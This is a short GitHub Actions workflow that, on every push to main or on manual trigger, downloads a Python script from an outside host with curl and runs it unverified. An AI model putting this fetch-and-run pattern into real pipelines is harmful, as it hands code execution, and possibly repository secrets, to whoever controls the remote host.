name: Run Remote Script
on:
  # Allow manual triggering
  workflow_dispatch:
  
  # Run on push to main branch (optional, remove if not needed)
  push:
    branches:
      - main
jobs:
  run-script:
    runs-on: ubuntu-latest
    
    steps:
      - name: Set up Python
        uses: actions/setup-python@v4
        with:
          python-version: '3.10'
      
      - name: Install dependencies
        run: |
          python -m pip install --upgrade pip
          pip install requests  # Add any other dependencies needed
      
      - name: Fetch and run script
        run: |
          # Download the script
          curl -s https://kv.infspeed.com/api/kv/github.py -o remote_script.py
          
          # Verify the script was downloaded successfully
          if [ -f "remote_script.py" ]; then
            echo "Script downloaded successfully. Running..."
            # Execute the script
            python remote_script.py
          else
            echo "Failed to download script"
            exit 1
          fi
      
      - name: Script execution completed
        run: echo "Remote script execution completed at $(date)"
